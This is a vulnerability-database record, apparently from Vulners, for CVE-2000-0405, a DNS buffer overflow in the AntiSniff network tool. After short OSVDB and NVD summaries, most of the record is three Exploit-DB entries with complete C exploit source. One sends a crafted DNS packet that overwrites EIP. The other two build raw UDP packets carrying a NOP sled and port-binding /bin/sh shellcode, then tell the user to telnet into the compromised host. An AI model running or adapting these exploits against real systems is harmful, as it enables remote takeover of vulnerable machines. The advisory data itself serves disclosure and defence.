{"edition": 1, "title": "AntiSniff DNS Overflow Remote Code Execution", "bulletinFamily": "software", "published": "2000-05-15T00:00:00", "lastseen": "2017-04-28T13:19:57", "modified": "2000-05-15T00:00:00", "reporter": "OSVDB", "viewCount": 7, "href": "https://vulners.com/osvdb/OSVDB:3179", "description": "## Vulnerability Description\nAntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests performed not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.\n## Solution Description\nUpgrade to version 1.02 or higher, as it has been reported to fix this vulnerability. Users may also install the vendor provided patch that mitigates this vulnerability.\n## Short Description\nAntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests performed not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.\n## References:\nOther Advisory URL: http://archives.neohapsis.com/archives/win2ksecadvice/2000-q2/0106.html\nISS X-Force ID: 4459\n[CVE-2000-0405](https://vulners.com/cve/CVE-2000-0405)\nBugtraq ID: 1207\n", "affectedSoftware": [{"name": "AntiSniff", "version": "1.01", "operator": "eq"}], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2017-04-28T13:19:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0405"]}, {"type": "exploitdb", "idList": ["EDB-ID:19918", "EDB-ID:19916", "EDB-ID:19917"]}], "modified": "2017-04-28T13:19:57", "rev": 2}, "vulnersScore": 7.8}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "cvelist": ["CVE-2000-0405"], "id": "OSVDB:3179"}

{"cve": [{"lastseen": "2021-02-02T05:19:02", "description": "Buffer overflow in L0pht AntiSniff allows remote attackers to execute arbitrary commands via a malformed DNS response packet.", "edition": 4, "cvss3": {}, "published": "2000-05-16T04:00:00", "title": "CVE-2000-0405", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0405"], "modified": "2008-09-10T19:04:00", "cpe": ["cpe:/a:atstake:antisniff:1.0.1", "cpe:/a:atstake:antisniff:1.0"], "id": "CVE-2000-0405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0405", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:atstake:antisniff:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atstake:antisniff:1.0:*:researchers:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T13:02:59", "description": "Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (1). CVE-2000-0405. Remote exploits for multiple platform", "published": "2000-05-16T00:00:00", "type": "exploitdb", "title": "Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0405"], "modified": "2000-05-16T00:00:00", "id": "EDB-ID:19916", "href": "https://www.exploit-db.com/exploits/19916/", "sourceData": "source: http://www.securityfocus.com/bid/1207/info\r\n\r\nCertain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.\r\n\r\nThis scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.\r\n\r\nNOTE: \r\n\r\nThis information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.\r\n\r\n/* dnslong.c by Hugo Breton (bretonh@pgci.ca)\r\n\r\n This program must be run in the DNS test phase of Sentinel and Anti Sniff.\r\n It illustrates how code can be run remotely on a Win98 machine running Anti\r\n Sniff.\r\n\r\n Suggested arguments are:\r\n \r\n \"dnslong host 5 65\" to send the Windows 98 version of Anti Sniff in an\r\n infinite loop.\r\n \"dnslong host 2 255\" to segfault the oBSD version of Anti Sniff.\r\n \"dnslong host 1 255\" to segfault Sentinel.\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n\r\nint main(int argc,char * * argv)\r\n{\r\n char p[1024];\r\n int sock,i,j,k,len,labelnum,labellen;\r\n struct sockaddr_in sin;\r\n struct hostent * hoste;\r\n\r\n printf(\"dnslong.c by Hugo Breton (bretonh@pgci.ca)\\n\");\r\n\r\n if(argc<4)\r\n {\r\n printf(\"usage: %s host label_count label_length\\n\",argv[0]);\r\n return(0);\r\n }\r\n\r\n bzero((void *) &sin,sizeof(sin));\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(53);\r\n\r\n if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)\r\n {\r\n if((hoste=gethostbyname(argv[1]))==NULL)\r\n {\r\n printf(\"unknown host %s\\n\",argv[1]);\r\n return(0);\r\n }\r\n \r\n bcopy(hoste->h_addr,&sin.sin_addr.s_addr,4);\r\n }\r\n\r\n labelnum=atoi(argv[2]);\r\n labellen=atoi(argv[3]);\r\n\r\n len=labelnum*(labellen+1)+5+12;\r\n\r\n if(len>1024)\r\n {\r\n printf(\"resulting packet will be too long\\n\");\r\n return(0);\r\n }\r\n\r\n bzero((void *) p,1024);\r\n * ((unsigned short *) (p+0))=htons(867-5309);\r\n * ((unsigned short *) (p+4))=htons(1);\r\n \r\n for(i=12,j=0;j<labelnum;j++)\r\n {\r\n * ((unsigned char *) (p+(i++)))=labellen;\r\n\r\n for(k=0;k<labellen;k++,i++)\r\n {\r\n * ((unsigned char *) (p+i))=0x90;\r\n }\r\n \r\n * ((unsigned char *) (p+i-2))=0xeb; /* jmp $-2 */\r\n * ((unsigned char *) (p+i-1))=0xfe; /* just make it loop */\r\n }\r\n\r\n * ((unsigned char *) (p+269))=0x20;\r\n * ((unsigned char *) (p+270))=0xff;\r\n * ((unsigned char *) (p+271))=0x87; \r\n * ((unsigned char *) (p+272))=0x01; /* new EIP */\r\n\r\n * ((unsigned char *) (p+(i++)))=0;\r\n\r\n * ((unsigned short *) (p+i))=htons(1);\r\n * ((unsigned short *) (p+i+2))=htons(1);\r\n\r\n if((sock=socket(AF_INET,SOCK_DGRAM,0))==-1)\r\n {\r\n printf(\"unable to create UDP socket\\n\");\r\n return(0);\r\n }\r\n\r\n if(sendto(sock,p,len,0,(struct sockaddr *) &sin,sizeof(sin))==-1)\r\n {\r\n printf(\"unable to send packet\\n\");\r\n return(0);\r\n }\r\n\r\n printf(\"packet sent to host %s\\n\",argv[1]);\r\n\r\n return(0);\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19916/"}, {"lastseen": "2016-02-02T13:03:08", "description": "Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (2). CVE-2000-0405. Remote exploits for multiple platform", "published": "2000-05-16T00:00:00", "type": "exploitdb", "title": "Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0405"], "modified": "2000-05-16T00:00:00", "id": "EDB-ID:19917", "href": "https://www.exploit-db.com/exploits/19917/", "sourceData": "source: http://www.securityfocus.com/bid/1207/info\r\n \r\nCertain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.\r\n \r\nThis scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.\r\n \r\nNOTE:\r\n \r\nThis information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.\r\n\r\n/* l0phtl0phe.c - antisniff exploit (1.02 included)\r\n *\r\n * -sc/teso\r\n *\r\n * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`\r\n *\r\n * description:\r\n * l0pht messed up the fix for their problem in antisniff by not regarding\r\n * the type signedness properties of the char and int values used. this\r\n * results in a cool method bypassing the too extra checks (length + strncat).\r\n * some work on this topic have been done by mixter, (bad results on type\r\n * casting), but it should be obvious to any security conscious programmers.\r\n * i'm not stating that they aren't allowed errors, but they should fix it\r\n * for sure if they're going to fix it at all. -sc.\r\n *\r\n * greetings to all teso, lam3rz, hert, adm, w00w00 and lds ppl.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n#include <libnet.h>\r\n\r\n\r\n#define\tOFFSET\t\t0xbffef9a0\r\n\r\nunsigned int\tbuild_xp (unsigned char *xp);\r\n\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tint\t\tsock;\t\t/* raw socket */\r\n\tu_long\t\tsrc_ip,\r\n\t\t\tdst_ip;\r\n\r\n\tunsigned char\txpbuf[512];\t/* this one gets complicated now */\r\n\tunsigned char\ttpack[512];\t/* paket buffer */\r\n\tunsigned int\tpl_len;\r\n\r\n\r\n\tif (argc != 3) {\r\n\t\tprintf (\"usage: %s <source ip> <dest ip>\\n\\n\", argv[0]);\r\n\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsock = libnet_open_raw_sock (IPPROTO_RAW);\r\n\tif (sock == -1) {\r\n\t\tperror (\"libnet_open_raw_sock\");\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsrc_ip = libnet_name_resolve (argv[1], 0);\r\n\tdst_ip = libnet_name_resolve (argv[2], 0);\r\n\r\n\tpl_len = build_xp (xpbuf);\r\n\r\n\tlibnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,\r\n\t\tsrc_ip, dst_ip, NULL, 0, tpack);\r\n\tlibnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,\r\n\t\ttpack + IP_H);\r\n\tlibnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,\r\n\t\txpbuf, pl_len, tpack + IP_H + UDP_H);\r\n\tlibnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);\r\n\r\n\t/* they use \"udp and dst port 53\" as bpf, so we should have no problem\r\n\t */\r\n\tlibnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);\r\n\tlibnet_close_raw_sock (sock);\r\n\r\n\tprintf (\"exploitation succeeded.\\n\");\r\n\tprintf (\"try: \\\"telnet %s 17664\\\" now.\\n\", argv[2]);\r\n\r\n\texit (EXIT_SUCCESS);\r\n}\r\n\r\n\r\n/* build_xp\r\n *\r\n * build exploit buffer into buffer pointed to by `xp'.\r\n */\r\n\r\nunsigned int\r\nbuild_xp (unsigned char *xp)\r\n{\r\n\r\n\r\n\r\n\r\n\t/* yea yea ugly buffer ;-) */\r\n\tunsigned char\tbuf[] =\r\n\t\t\"\\x7c\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\xeb\\x01\"\r\n\t\t\"\\x7d\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\xeb\\x08\\x00\"\r\n\t\t\"\\xfe\\x10\\x10\\xff\\xbf\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\xeb\\x20\"\r\n\t\t\"\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x3c\\xf8\\xfe\\xbf\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\r\n\t\t/* portshell 17644 portshellcode by smiler & scut */\r\n\t\t\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x09\\xc0\\x74\\x06\\x31\\xc0\"\r\n\t\t\"\\xfe\\xc0\\xcd\\x80\\xeb\\x76\\x5f\\x89\\x4f\\x10\\xfe\\xc1\"\r\n\t\t\"\\x89\\x4f\\x0c\\xfe\\xc1\\x89\\x4f\\x08\\x8d\\x4f\\x08\\xfe\"\r\n\t\t\"\\xc3\\xb0\\x66\\xcd\\x80\\xfe\\xc3\\xc6\\x47\\x10\\x10\\x66\"\r\n\t\t\"\\x89\\x5f\\x14\\x88\\x47\\x08\\xb0\\x45\\x66\\x89\\x47\\x16\"\r\n\t\t\"\\x89\\x57\\x18\\x8d\\x4f\\x14\\x89\\x4f\\x0c\\x8d\\x4f\\x08\"\r\n\t\t\"\\xb0\\x66\\xcd\\x80\\x89\\x5f\\x0c\\xfe\\xc3\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x89\\x57\\x0c\\x89\\x57\\x10\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x31\\xc9\\x88\\xc3\\xb0\\x3f\\xcd\\x80\\xfe\"\r\n\t\t\"\\xc1\\xb0\\x3f\\xcd\\x80\\xfe\\xc1\\xb0\\x3f\\xcd\\x80\\x31\"\r\n\t\t\"\\xd2\\x88\\x57\\x07\\x89\\x7f\\x0c\\x89\\xfb\\x8d\\x4f\\x0c\"\r\n\t\t\"\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x99\\x31\\xdb\\x31\\xc9\\xe8\"\r\n\t\t\"\\x7e\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\";\r\n\r\n\tbuf[287] = (OFFSET ) & 0xff;\r\n\tbuf[288] = (OFFSET >> 8) & 0xff;\r\n\tbuf[289] = (OFFSET >> 16) & 0xff;\r\n\tbuf[290] = (OFFSET >> 24) & 0xff;\r\n\r\n\tmemcpy (xp, buf, sizeof (buf));\r\n\r\n\treturn (sizeof (buf));;\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19917/"}, {"lastseen": "2016-02-02T13:03:15", "description": "Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (3). CVE-2000-0405. Remote exploits for multiple platform", "published": "2000-05-16T00:00:00", "type": "exploitdb", "title": "Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0405"], "modified": "2000-05-16T00:00:00", "id": "EDB-ID:19918", "href": "https://www.exploit-db.com/exploits/19918/", "sourceData": "source: http://www.securityfocus.com/bid/1207/info\r\n \r\nCertain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.\r\n \r\nThis scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.\r\n \r\nNOTE:\r\n \r\nThis information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.\r\n\r\n\r\n\r\n/* l0phtl0phe.c - antisniff exploit (1-1-1 \"second fixed version\" included)\r\n *\r\n * -scut/teso\r\n *\r\n * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`\r\n *\r\n * description:\r\n * l0pht messed up the fix for their problem in antisniff by not regarding\r\n * the type signedness properties of the char and int values used. this\r\n * results in a cool method bypassing the too extra checks (length + strncat).\r\n * some work on this topic have been done by mixter, (bad results on type\r\n * casting), but it should be obvious to any security conscious programmers.\r\n * i'm not stating that they aren't allowed errors, but they should fix it\r\n * for sure if they're going to fix it at all. -sc.\r\n *\r\n * 2nd version: script kiddie proof to avoid that \"doesn't work\" lamer claim.\r\n *\r\n * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n#include <libnet.h>\r\n\r\n\r\n#define\tOFFSET\t\t0xbffef9a0\r\n\r\nunsigned int\tbuild_xp (unsigned char *xp);\r\n\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tint\t\tsock;\t\t/* raw socket */\r\n\tu_long\t\tsrc_ip,\r\n\t\t\tdst_ip;\r\n\r\n\tunsigned char\txpbuf[1024];\t/* this one gets complicated now */\r\n\tunsigned char\ttpack[2048];\t/* paket buffer */\r\n\tunsigned int\tpl_len;\r\n\r\n\r\n\tif (argc != 3) {\r\n\t\tprintf (\"usage: %s <source ip> <dest ip>\\n\\n\", argv[0]);\r\n\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsock = libnet_open_raw_sock (IPPROTO_RAW);\r\n\tif (sock == -1) {\r\n\t\tperror (\"libnet_open_raw_sock\");\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsrc_ip = libnet_name_resolve (argv[1], 0);\r\n\tdst_ip = libnet_name_resolve (argv[2], 0);\r\n\r\n\tpl_len = build_xp (xpbuf);\r\n\r\n\tlibnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,\r\n\t\tsrc_ip, dst_ip, NULL, 0, tpack);\r\n\tlibnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,\r\n\t\ttpack + IP_H);\r\n\tlibnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,\r\n\t\txpbuf, pl_len, tpack + IP_H + UDP_H);\r\n\tlibnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);\r\n\r\n\t/* they use \"udp and dst port 53\" as bpf, so we should have no problem\r\n\t */\r\n\tlibnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);\r\n\tlibnet_close_raw_sock (sock);\r\n\r\n\tprintf (\"exploitation succeeded.\\n\");\r\n\tprintf (\"try: \\\"telnet %s 17664\\\" now.\\n\", argv[2]);\r\n\r\n\texit (EXIT_SUCCESS);\r\n}\r\n\r\n\r\n/* build_xp\r\n *\r\n * build exploit buffer into buffer pointed to by `xp'.\r\n */\r\n\r\nunsigned int\r\nbuild_xp (unsigned char *xp)\r\n{\r\n\tint\t\ti;\r\n\tunsigned char\tbuf[1024];\r\n\tunsigned char\tshellcode[] =\r\n\t\t/* portshell 17644 portshellcode by smiler & scut */\r\n\t\t\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x09\\xc0\\x74\\x06\\x31\\xc0\"\r\n\t\t\"\\xfe\\xc0\\xcd\\x80\\xeb\\x76\\x5f\\x89\\x4f\\x10\\xfe\\xc1\"\r\n\t\t\"\\x89\\x4f\\x0c\\xfe\\xc1\\x89\\x4f\\x08\\x8d\\x4f\\x08\\xfe\"\r\n\t\t\"\\xc3\\xb0\\x66\\xcd\\x80\\xfe\\xc3\\xc6\\x47\\x10\\x10\\x66\"\r\n\t\t\"\\x89\\x5f\\x14\\x88\\x47\\x08\\xb0\\x45\\x66\\x89\\x47\\x16\"\r\n\t\t\"\\x89\\x57\\x18\\x8d\\x4f\\x14\\x89\\x4f\\x0c\\x8d\\x4f\\x08\"\r\n\t\t\"\\xb0\\x66\\xcd\\x80\\x89\\x5f\\x0c\\xfe\\xc3\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x89\\x57\\x0c\\x89\\x57\\x10\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x31\\xc9\\x88\\xc3\\xb0\\x3f\\xcd\\x80\\xfe\"\r\n\t\t\"\\xc1\\xb0\\x3f\\xcd\\x80\\xfe\\xc1\\xb0\\x3f\\xcd\\x80\\x31\"\r\n\t\t\"\\xd2\\x88\\x57\\x07\\x89\\x7f\\x0c\\x89\\xfb\\x8d\\x4f\\x0c\"\r\n\t\t\"\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x99\\x31\\xdb\\x31\\xc9\\xe8\"\r\n\t\t\"\\x7e\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\";\r\n\r\n\tunsigned char\thead[] =\r\n\t\t\"\\x07-7350-\\x00\\xfe\";\r\n\r\n\tmemcpy (buf, head, 9);\r\n\tfor (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)\r\n\t\tbuf[i] = '\\x90';\r\n\tmemcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,\r\n\t\tstrlen (shellcode));\r\n\r\n\tbuf[272] = '\\xeb';\r\n\tbuf[273] = '\\x08';\r\n\tbuf[274] = (OFFSET ) & 0xff;\r\n\tbuf[275] = (OFFSET >> 8) & 0xff;\r\n\tbuf[276] = (OFFSET >> 16) & 0xff;\r\n\tbuf[277] = (OFFSET >> 24) & 0xff;\r\n\r\n\tmemcpy (xp, buf, sizeof (buf));\r\n\r\n\treturn (sizeof (buf));;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19918/"}]}